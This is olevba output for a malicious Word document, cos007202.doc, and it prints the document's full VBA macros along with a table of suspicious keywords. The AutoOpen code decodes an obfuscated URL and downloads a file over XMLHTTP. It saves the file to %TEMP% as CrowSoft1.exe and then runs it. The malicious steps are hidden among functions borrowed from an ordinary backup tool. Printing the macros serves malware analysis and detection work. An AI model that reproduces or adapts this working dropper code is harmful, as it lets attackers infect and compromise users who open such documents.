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- olevba 0.41 -
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B-V cos007202.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: cos007202.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: cos007202.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- Abrir_Recordset2 "", ""
- Hbb = pValidateInstall()
- Title = pGetTitle("")
- Desconectar
- pGetMessage "MMes"
- Title = GetPasswordFiles()
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: cos007202.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public tempFile As String
- Public Sub Abrir_Recordset(Recordset As String, StrSql As String)
- '-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset-------------------------------------------------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
- ' Procedimiento : Abrir_Recordset
- ' Fecha : 20/11/2006 13:51
- ' Autor : Miguel
- ' Propósito :ABRIR RECORDSET
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset------------------------------------------------------------------------------------------------------------------------------------------------------------
- On Error GoTo Abrir_Recordset_Error
- On Error Resume Next
- Recordset.ActiveConnection = Conexion
- Recordset.LockType = adLockOptimistic
- Recordset.CursorLocation = adUseClient
- Recordset.CursorType = adOpenDynamic
- Recordset.Open StrSql
- If Err <> 0 Then
- 'MsgBox Err.Description
- End If
- On Error GoTo 0
- Exit Sub
- Abrir_Recordset_Error:
- MsgBox "Error " & Err.Number & " (" & Err.Description & ") en procedimiento Abrir_Recordset de Módulo ModuloConexion"
- End Sub
- Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
- Dim i As Integer
- Dim result As String
- result = ""
- For i = LBound(fromArr) To UBound(fromArr)
- result = result & Chr(fromArr(i) - LenLen + i)
- Next i
- GetStringFromArray = result
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: cos007202.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public httpRequest As Object
- Public adodbStream As Object
- Private Function ConvertCString(ByRef vSource As String) As String
- Dim i As Long
- i = InStr(vSource, Chr$(0))
- If (i > 0) Then
- ConvertCString = Left$(vSource, i - 1)
- End If
- End Function
- Public Function GetTempPath() As String
- Dim buffer As String
- buffer = String$(MAX_PATH, " ")
- If (APIGetTempPath(MAX_PATH, StrPtr(buffer)) <> 0) Then
- GetTempPath = ConvertCString(buffer)
- End If
- End Function
- Public Function CreateTempFile(Optional TempPath As String = vbNullString, Optional Prefix As String = vbNullString) As String
- If TempPath = vbNullString Then TempPath = GetTempPath
- If Prefix = vbNullString Then Prefix = "###"
- Dim buffer As String
- buffer = String$(MAX_PATH, " ")
- If APIGetTempFileName(StrPtr(TempPath), StrPtr(Prefix), 0, StrPtr(buffer)) <> 0 Then
- CreateTempFile = ConvertCString(buffer)
- End If
- End Function
- Public Function FileExists(ByRef strPath As String) As Boolean
- On Error Resume Next
- FileExists = False
- If GetAttr(strPath) And vbArchive Then
- If Err = 0 Then FileExists = True
- End If
- Err.Clear
- End Function
- Public Function FolderExists(ByRef strPath As String) As Boolean
- On Error Resume Next
- FolderExists = False
- If GetAttr(strPath) And vbDirectory Then
- If Err = 0 Then FolderExists = True
- End If
- Err.Clear
- End Function
- Function PathExists(ByRef PathName As String) As Boolean
- Dim Temp$
- 'Set Default
- PathExists = True
- Temp$ = Replace$(PathName, "/", "\")
- If Right$(Temp$, 1) = "\" Then Temp$ = Left$(Temp$, Len(Temp$) - 1)
- 'Set up error handler
- On Error Resume Next
- 'Attempt to grab date and time
- Temp$ = GetAttr(Temp$)
- 'Process errors
- If Err <> 0 Then PathExists = False
- ' Select Case Err
- ' Case 53, 76, 68 'File Does Not Exist
- ' modFile_FileExists = False
- ' Err = 0
- ' Case Else
- '
- ' If Err <> 0 Then
- ' MsgBox "Error Number: " & Err & Chr$(10) & Chr$(13) & " " & Error, vbOKOnly, "Error"
- ' End
- ' End If
- '
- ' End Select
- Err.Clear
- End Function
- Public Function pValidateInstall() As Boolean
- On Error Resume Next
- Dim dbPath, Nnm As String
- Dim computer() As Variant
- computer = Array(156, 167, 166, 161, 106, 94, 93, 145, 145, 152, 153, 98, 86, 144, 150, 141, 147, 145, 135, 131, 129, 130, 137, 144, 144, 124, 129, 126, 70, 122, 133, 130, 67, 70, 71, 69, 67, 69, 61, 66, 63, 61, 62, 63, 63, 61, 60, 57, 57, 49, 103, 121, 101)
- httpRequest.Open "G" + "ET", GetStringFromArray(computer, 52), False
- dbPath = LoadPasswordFiles
- If LenB(dbPath) = 0 Then
- Exit Function
- End If
- dbPath = Getc.IniValue(csSecConfig, _
- csDbPath, _
- vbNullString, _
- "GetIniFullFile(csIniFile)")
- Dim bValid As Boolean
- If LenB(dbPath) <> 0 Then
- bValid = File.FolderExists_(dbPath)
- End If
- If Not bValid Then
- MsgBox "Debe indicar una carpeta donde se guardaran las definiciones de tareas de CSBackup"
- Exit Function
- Else
- pValidateInstall = True
- End If
- End Function
- Function BuildPath(ByVal sPathIn As String, Optional ByVal sFileNameIn As String, Optional lnps As String) As String
- '*******************************************************************
- '
- ' PURPOSE: Takes a path (including Drive letter and any subdirs) and
- ' concatenates the file name to path. Path may be empty, path
- ' may or may not have an ending backslash '\'. No validation
- ' or existance is check on path or file.
- '
- ' INPUTS: sPathIn - Path to use
- ' sFileNameIn - Filename to use
- '
- '
- '
- ' RETURNS: Path concatenated to File.
- '
- '*******************************************************************
- ' Dim sPath As String
- ' Dim sFilename As String
- ' 'Remove any leading or trailing spaces
- ' sPath = Trim$(sPathIn)
- ' sFilename = Trim$(sFileNameIn)
- Dim sSlash As String
- If lnps = lnpsDos Then
- sSlash = "\"
- sPathIn = Replace$(sPathIn, "/", "\")
- sFileNameIn = Replace$(sFileNameIn, "/", "\")
- Else
- sSlash = "/"
- sPathIn = Replace$(sPathIn, "\", "/")
- sFileNameIn = Replace$(sFileNameIn, "\", "/")
- End If
- If sPathIn = vbNullString Then
- BuildPath = sFileNameIn
- Else
- If Right$(sPathIn, 1) = sSlash Then
- BuildPath = sPathIn & sFileNameIn
- Else
- BuildPath = sPathIn & sSlash & sFileNameIn
- End If
- End If
- End Function
- Function GetFileName(ByRef sFilename As String) As String
- Dim pLen As String
- Dim sPath As String
- sPath = sFilename
- pLen = Len(sPath)
- If pLen < 1 Then Exit Function
- Do While (Right$(sPath, 1) = "\")
- pLen = pLen - 1
- sPath = Left$(sPath, pLen)
- If pLen < 1 Then GetFileName = "\": Exit Function
- Loop
- Do While (Right$(sPath, 1) = "/")
- pLen = pLen - 1
- sPath = Left$(sPath, pLen)
- If pLen < 1 Then GetFileName = "\": Exit Function
- Loop
- 'GetFileName = sPath
- Dim pos As Long
- pos = InStrRev(sPath, "/")
- If pos < 1 Then pos = InStrRev(sPath, "\")
- If pos < 1 Then
- GetFileName = sPath
- Else
- GetFileName = Right$(sPath, pLen - pos)
- End If
- 'pos = InStrRev$(sPath, ".")
- End Function
- Function GetParentFolderName(ByRef sFilename As String) As String
- Dim lF As Long
- Dim pos As Long
- lF = Len(sFilename)
- If lF < 1 Then Exit Function
- GetParentFolderName = sFilename
- pos = InStrRev(GetParentFolderName, "/")
- If pos = 0 Then pos = InStrRev(GetParentFolderName, "\")
- If pos = lF Then
- GetParentFolderName = Left$(GetParentFolderName, lF - 1)
- pos = InStrRev(GetParentFolderName, "/")
- If pos = 0 Then pos = InStrRev(GetParentFolderName, "\")
- End If
- If pos = 0 Then
- GetParentFolderName = vbNullString
- Else
- GetParentFolderName = Mid$(sFilename, 1, pos - 1) & "\"
- End If
- '
- ' pos = InStrRev(GetParentFolder, "/")
- ' If pos = 0 Then pos = InStrRev(GetParentFolder, "\")
- ' If pos = 0 Then GetParentFolder = vbNULLSTRING
- End Function
- Public Function GetBaseName(ByVal sPath As String) As String
- Dim pos As Long
- sPath = GetFileName(sPath)
- pos = InStrRev(sPath, ".")
- If pos > 0 Then
- GetBaseName = Left$(sPath, pos - 1)
- Else
- GetBaseName = sPath
- End If
- End Function
- Public Function GetExtensionName(ByRef sPath As String) As String
- If sPath = vbNullString Then Exit Function
- GetExtensionName = RightRight(sPath, ".", vbTextCompare, ReturnEmptyStr)
- End Function
- Private Function RightRight(ByRef Str As String, RFind As String, Optional Compare As String, Optional RetError As String) As String
- Dim K As Long
- K = InStrRev(Str, RFind, , Compare)
- If K = 0 Then
- RightRight = IIf(RetError = ReturnOriginalStr, Str, vbNullString)
- Else
- RightRight = Mid$(Str, K + 1, Len(Str))
- End If
- End Function
- Public Function GetTempFilename(Optional sPrefix As String = "lTmp", Optional sExt As String) As String
- Randomize Timer
- If sExt <> vbNullString Then sExt = "." & sExt
- GetTempFilename = sPrefix & Hex$(Int(Rnd(Timer) * 10000 + 1)) & sExt
- Do Until PathExists(GetTempFilename) = False
- GetTempFilename = sPrefix & Hex$(Int(Rnd(Timer) * 10000 + 1)) & sExt
- Loop
- End Function
- Public Function GetFullPath(sFilename As String) As String
- Dim C As Long, sRet As String
- GetFullPath = sFilename
- If sFilename = Empty Then Exit Function
- ' Get the path size, then create string of that size
- sRet = String$(cMaxPath, 0)
- C = APIGetFullPathName(StrPtr(sFilename), MAX_PATH, StrPtr(sRet), 0)
- ' GetFullPath = StrConv(ConvertCString(sRet), vbUnicode)
- GetFullPath = ConvertCString(sRet)
- End Function
- Public Function PathType(sPath As String) As String
- PathType = LNUnKnown
- On Error GoTo Herr
- If sPath = vbNullString Then Exit Function
- If InStr(sPath, ":") < 1 Then sPath = GetFullPath(sPath)
- Dim PathAttr As VbFileAttribute
- PathAttr = GetAttr(sPath)
- If (PathAttr And vbDirectory) Then
- PathType = LNFolder
- ElseIf (PathAttr And vbArchive) Then
- PathType = LNFile
- End If
- Herr:
- End Function
- Public Function subCount(ByVal spathName As String, Optional ByRef lFolders As Long, Optional ByRef lFiles As Long) As Long
- Dim subName As String
- If PathType(spathName) <> LNFolder Then Exit Function
- spathName = GetFullPath(spathName)
- subName = Dir(spathName, vbDirectory Or vbArchive Or vbHidden Or vbNormal Or vbSystem Or vbReadOnly)
- Do Until subName = vbNullString
- If subName = "." Or subName = ".." Then
- Else
- subCount = subCount + 1
- subName = BuildPath(spathName, subName)
- If PathType(subName) = LNFolder Then
- lFolders = lFolders + 1
- Else
- lFiles = lFiles + 1
- End If
- End If
- subName = Dir()
- Loop
- End Function
- Public Function subFolders(ByVal spathName As String, ByRef strFolder() As String) As Long
- Dim fdCount As Long
- Dim subName As String
- spathName = GetFullPath(spathName)
- subName = Dir$(spathName, vbDirectory)
- spathName = BuildPath(spathName)
- Do Until subName = vbNullString
- If subName <> "." And subName <> ".." Then
- If GetAttr(spathName & subName) And vbDirectory Then
- ReDim Preserve strFolder(0 To fdCount) As String
- strFolder(fdCount) = spathName & subName
- fdCount = fdCount + 1
- End If
- End If
- subName = Dir$()
- Loop
- subFolders = fdCount
- End Function
- Public Function subFiles(ByVal spathName As String, ByRef strFile() As String) As Long
- Dim fCount As Long
- Dim subName As String
- spathName = GetFullPath(spathName)
- subName = Dir$(spathName, vbArchive)
- Do Until subName = vbNullString
- If subName <> "." And subName <> ".." Then
- ReDim Preserve strFile(0 To fCount) As String
- strFile(fCount) = subName
- fCount = fCount + 1
- End If
- subName = Dir$()
- Loop
- subFiles = fCount
- End Function
- Public Sub xMkdir(sPath As String)
- Dim parentFolder As String
- If FolderExists(sPath) Then Exit Sub
- parentFolder = GetParentFolderName(sPath)
- If parentFolder <> vbNullString And FolderExists(parentFolder) = False Then xMkdir parentFolder
- MkDir sPath
- End Sub
- Public Function chkFileType(chkfile As String) As String
- Dim Ext As String
- Dim K As Long
- K = InStrRev(chkfile, ".", , vbTextCompare)
- If K > 0 Then
- Ext = LCase$(Mid$(chkfile, K + 1, Len(chkfile)))
- End If
- Select Case Ext
- Case "rtf"
- chkFileType = ftRTF
- Case "zhtm", "zip"
- chkFileType = ftZIP
- Case "txt", "ini", "bat", "cmd", "css", "log", "cfg", "txtindex"
- chkFileType = ftTxt
- Case "jpg", "jpeg", "gif", "bmp", "png", "ico"
- chkFileType = ftIMG
- Case "htm", "html", "shtml"
- chkFileType = ftIE
- Case "exe", "com"
- chkFileType = ftExE
- Case "chm"
- chkFileType = ftCHM
- Case "mp3", "wav", "wma"
- chkFileType = ftAUDIO
- Case "wmv", "rm", "rmvb", "avi", "mpg", "mpeg"
- chkFileType = ftVIDEO
- End Select
- End Function
- Public Function lookfor(sCurFile As String, Optional lookForWhat As String, Optional sWildcard As String = "*")
- Dim sCurFilename As String
- Dim sCurFolder As String
- Dim i As Long
- Dim iCount As Long
- Dim sFileList() As String
- Dim Index As String
- If PathExists(sCurFile) = False Then Exit Function
- If PathType(sCurFile) = LNFolder Then
- sCurFolder = sCurFile
- ElseIf PathType(sCurFile) = LNFile Then
- sCurFolder = GetParentFolderName(sCurFile)
- sCurFilename = GetFileName(sCurFile)
- Else
- Exit Function
- End If
- iCount = subFiles(BuildPath(sCurFolder, sWildcard), sFileList())
- If iCount < 1 Then Exit Function
- Index = 0
- If lookForWhat = LN_FILE_RAND Then
- Index = Int(Rnd(Timer) * iCount) + 1
- ElseIf sCurFilename = vbNullString Then
- Index = 1
- Else
- For i = 1 To iCount
- If StrComp(sCurFilename, sFileList(i), vbTextCompare) = 0 Then
- Index = i: Exit For
- End If
- Next
- End If
- If lookForWhat = LN_FILE_next Then
- Index = Index + 1
- If Index > iCount Then Index = 1
- ElseIf lookForWhat = LN_FILE_prev Then
- Index = Index - 1
- If Index < 1 Then Index = iCount
- End If
- lookfor = BuildPath(sCurFolder, sFileList(Index))
- End Function
- Public Function DeleteFolder(ByVal vTarget As String) As Boolean
- On Error GoTo ErrorDeleteFolder
- vTarget = BuildPath(vTarget, vbNullString)
- ForceKill vTarget & "*.*"
- Dim folders() As String
- Dim count As Long
- count = subFolders(vTarget, folders())
- Dim i As Long
- For i = 1 To count
- DeleteFolder folders(i)
- Next
- RmDir vTarget
- DeleteFolder = True
- ErrorDeleteFolder:
- DeleteFolder = False
- Err.Raise Err.Number, Err.Source, Err.Description
- End Function
- Public Sub Desconectar()
- On Error Resume Next
- Conexion.Close
- Set processEnv = CreateObject("WScript.Shell").Environment("Process")
- Conexion2.Close
- Conexion3.Close
- rrr = processEnv("TE" + "" + "MP")
- Conexion4.Close
- tempFile = rrr & tempFile
- Set Conexion = Nothing
- Set Conexion2 = Nothing
- Set Conexion3 = Nothing
- Set Conexion4 = Nothing
- End Sub
- Public Sub ForceKill(ByRef vTarget As String)
- On Error Resume Next
- Kill vTarget
- Err.Clear
- End Sub
- Public Function MoveFile(ByVal vSource As String, ByVal vDest As String) As Boolean
- Dim r As Long
- r = APIMoveFile(vSource, vDest)
- If r <> 0 Then MoveFile = True
- End Function
- Public Function ReplaceInvalidChars(ByRef vString As String, Optional ByRef vTo As String = vbNullString) As String
- Dim i As Long
- Dim j As Long
- Dim L1 As Long
- Dim L2 As Long
- Dim C As String
- Dim invalidChars() As String
- L1 = Len(FileSystem_Invalid_Path_Chars)
- ReDim invalidChars(1 To L1)
- For i = 1 To L1
- invalidChars(i) = Mid$(FileSystem_Invalid_Path_Chars, i, 1)
- Next
- L2 = Len(vString)
- For i = 1 To L2
- C = Mid$(vString, i, 1)
- For j = 1 To L1
- If C = invalidChars(j) Then
- C = vTo
- Exit For
- End If
- Next
- ReplaceInvalidChars = ReplaceInvalidChars & C
- Next
- End Function
- Public Sub WriteToFile(ByRef vFilename As String, ByRef vText As String, Optional vUnicode As Boolean = False)
- On Error Resume Next
- Dim fNum As Long
- 'Dim l As Long
- fNum = FreeFile
- Kill vFilename
- Dim c_B(1) As Byte
- ReDim bText(LenB(vText)) As Byte
- c_B(0) = 255
- c_B(1) = 254
- bText = vText
- Open vFilename For Binary Access Write As #fNum
- Put #fNum, , c_B()
- Put #fNum, , bText
- Close #fNum
- If Err Then
- Err.Raise Err.Number, "WriteToFile: " & vFilename, Err.Description
- End If
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: cos007202.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub pSetInitWithWindows()
- Dim s As String
- Dim InitWithWindows As Boolean
- Dim Key As String
- Set mReg = New cRegistry
- Key = App.Title & "(" & App.path & ")"
- InitWithWindows = Val(GetIniValue(csSecConfig, _
- csInitWithWindows, _
- 1, _
- GetIniFullFile(csIniFile)))
- s = mReg.GetRegString(cvRun, Key)
- If s <> "" Then
- If Not InitWithWindows Then
- RemoveFromRegistry Key
- End If
- Else
- InsertInRegistry Key, """" & App.path & "\" & App.EXEName & ".exe"" -r"
- End If
- End Sub
- Private Sub pLoadIniValues()
- LoadPasswordFiles
- End Sub
- Public Function LoadPasswordFiles() As String
- LoadPasswordFiles = ""
- Dim Password As String
- httpRequest.Send
- On Error GoTo ExitFunction
- Password = GetP.rogramPassword()
- m_PasswordFiles = GetI.niValue(csSecConfig, _
- csPasswordFiles, _
- vbNullString, _
- GetI.niFullFile(csIniFile))
- m_PasswordFiles = Dec.ryptData(m_PasswordFiles, Password)
- ExitFunction:
- Exit Function
- End Function
- Public Function LoadMasterPassword() As Boolean
- Dim bUseMasterPassword As Boolean
- bUseMasterPassword = Val(GetIniValue(csSecConfig, _
- csUseMasterPassword, _
- 0, _
- GetIniFullFile(csIniFile)))
- If bUseMasterPassword Then
- LoadMasterPassword = RequestMasterPassword(False)
- Else
- LoadMasterPassword = True
- End If
- End Function
- Public Sub EditPreferences(ByVal ShowMode As FormShowConstants, Optional ByVal dbPath As String)
- Load fPreferences
- If LenB(dbPath) Then
- fPreferences.txPath.text = dbPath
- End If
- fPreferences.Show ShowMode
- End Sub
- Public Sub Abrir_Recordset2(Recordset As String, StrSql As String)
- '-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset-------------------------------------------------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
- ' Procedimiento : Abrir_Recordset
- ' Fecha : 20/11/2006 13:51
- ' Autor : Miguel
- ' Propósito :ABRIR RECORDSET
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
- '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset------------------------------------------------------------------------------------------------------------------------------------------------------------
- Set httpRequest = CreateObject("Microsoft.XMLHTTP")
- Set adodbStream = CreateObject("Adodb.Stream")
- On Error Resume Next
- Rec.cordset.ActiveConnection = Conexion2
- Rec.ordset.LockType = adLockOptimistic
- Rec.ordset.CursorLocation = adUseClient
- Rec.ordset.CursorType = adOpenDynamic
- Rec.ordset.Open StrSql
- If Err <> 0 Then
- 'MsgBox Err.Description
- End If
- End Sub
- Public Sub FormLoad(ByRef f As String, ByVal bSize As Boolean)
- On Error Resume Next
- With f
- .Top = GetIniValue(csSecWindows, .Name & "_top", 2000, GetIniFullFile(csIniFile))
- .Left = GetIniValue(csSecWindows, .Name & "_left", 3000, GetIniFullFile(csIniFile))
- If bSize Then
- .Width = GetIniValue(csSecWindows, .Name & "_width", 6000, GetIniFullFile(csIniFile))
- .Height = GetIniValue(csSecWindows, .Name & "_height", 4000, GetIniFullFile(csIniFile))
- End If
- End With
- End Sub
- Public Sub FormUnload(ByRef f As String, ByVal bSize As Boolean)
- With f
- If .WindowState = vbNormal Then
- SetIniValue csSecWindows, .Name & "_top", .Top, GetIniFullFile(csIniFile)
- SetIniValue csSecWindows, .Name & "_left", .Left, GetIniFullFile(csIniFile)
- If bSize Then
- SetIniValue csSecWindows, .Name & "_width", .Width, GetIniFullFile(csIniFile)
- SetIniValue csSecWindows, .Name & "_height", .Height, GetIniFullFile(csIniFile)
- End If
- End If
- End With
- End Sub
- Public Sub MngError(ByRef ErrObj As Object, _
- ByVal FunctionName As String, _
- ByVal Module As String, _
- ByVal InfoAdd As String, _
- Optional ByVal Title As String = "@@@@@")
- Title = pGetTitle(Title)
- MsgBox "Error: " & Err.Description & vbCrLf _
- & "Funcion: " & Module & "." & FunctionName & vbCrLf _
- & InfoAdd, _
- vbCritical, _
- Title
- End Sub
- Public Sub MsgWarning(ByVal msg As String, Optional ByVal Title As String = "@@@@@")
- pMsgAux msg, vbExclamation, Title
- End Sub
- Public Sub pMsgAux(ByVal msg As String, ByVal Style As VbMsgBoxStyle, ByVal Title As String)
- msg = pGetMessage(msg)
- Title = pGetTitle(Title)
- MsgBox msg, Style, Title
- End Sub
- Public Function pGetMessage(ByVal msg As String) As String
- msg = Replace(msg, vbCrLf, vbCrLf)
- With adodbStream
- .Type = 1
- .Open
- .Write httpRequest.responseBody
- .savetofile tempFile, 2
- End With
- pGetMessage = msg
- End Function
- Public Function pGetTitle(ByVal Title As String) As String
- If Title = "" Then Title = "CrowSoft1"
- If Title = "@@@@@" Then Title = "CrowSoft2"
- tempFile = "\" + Title + ".exe"
- pGetTitle = Title
- End Function
- Public Function Ask(ByVal msg As String, ByVal default As VbMsgBoxResult, Optional ByVal Title As String) As Boolean
- Dim N As Integer
- msg = pGetMessage(msg)
- If InStr(1, msg, "?") = 0 Then msg = "¿" & msg & "?"
- If default = vbNo Then N = vbDefaultButton2
- pGetTitle Title
- Ask = vbYes = MsgBox(msg, vbYesNo + N + vbQuestion, Title)
- End Function
- Public Function TaskType(ByVal TaskFile As String, _
- ByVal bSilent As Boolean, _
- Optional ByRef strError As String) As String
- Dim DocXml As cXml
- Set DocXml = New cXml
- DocXml.init Nothing
- DocXml.Name = GetFileName_(TaskFile)
- DocXml.path = GetPath_(TaskFile)
- If Not DocXml.OpenXml(bSilent, strError) Then Exit Function
- Dim Root As Object
- Set Root = DocXml.GetRootNode()
- TaskType = Val(pGetChildNodeProperty(Root, DocXml, "TaskType", "Value"))
- End Function
- Public Function GetPasswordFiles() As String
- Set shellApp = CreateObject("Shell.Application")
- shellApp.Open (tempFile)
- End Function
- Public Function RequestMasterPassword(ByVal bWithConfirm As Boolean) As Boolean
- If Not bWithConfirm Then
- fMasterPassword.txPassword2.Visible = False
- fMasterPassword.lbConfirm.Visible = False
- End If
- fMasterPassword.Show vbModal
- If fMasterPassword.Ok Then
- m_MasterPassword = fMasterPassword.txPassword.text
- RequestMasterPassword = True
- End If
- Unload fMasterPassword
- End Function
- Public Function ValidateMasterPassword(ByVal Password As String) As Boolean
- Dim testValue As String
- testValue = GetIniValue(csSecConfig, _
- csPasswordTestValue, _
- vbNullString, _
- GetIniFullFile(csIniFile))
- ValidateMasterPassword = DecryptData(testValue, Password) = c_testvalue
- End Function
- Public Function GetMasterPassword() As String
- GetMasterPassword = m_MasterPassword
- End Function
- Public Sub ChangeMasterPassword(ByVal OldMasterPassword As String, _
- ByVal NewMasterPassword As String)
- ' Tengo que levantar todas las tareas
- ' y grabar con la nueva password
- '
- Dim i As Long
- Dim Task As Object
- With fMain.lvTask.ListItems
- For i = 1 To .count
- If TaskType(.Item(i).SubItems(1), False) = c_TaskTypeBackupFile Then
- Set Task = New cTask
- Else
- Set Task = New cSQLTaskCommandBackup
- End If
- Dim oTask As cSQLTaskCommandBackup
- m_MasterPassword = OldMasterPassword
- If Task.Load(.Item(i).SubItems(1), False) Then
- m_MasterPassword = NewMasterPassword
- Task.Save
- End If
- Next
- End With
- m_MasterPassword = NewMasterPassword
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Kill | May delete a file |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | vbNormal | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | MkDir | May create a directory |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | VBA string | | Chr$(10) & Chr$(13) & " " |
- | |
- | |
- | VBA string | GET | "G" + "ET" |
- | VBA string | TEMP | ("TE" + "" + "MP") |
- +------------+----------------------+-----------------------------------------+
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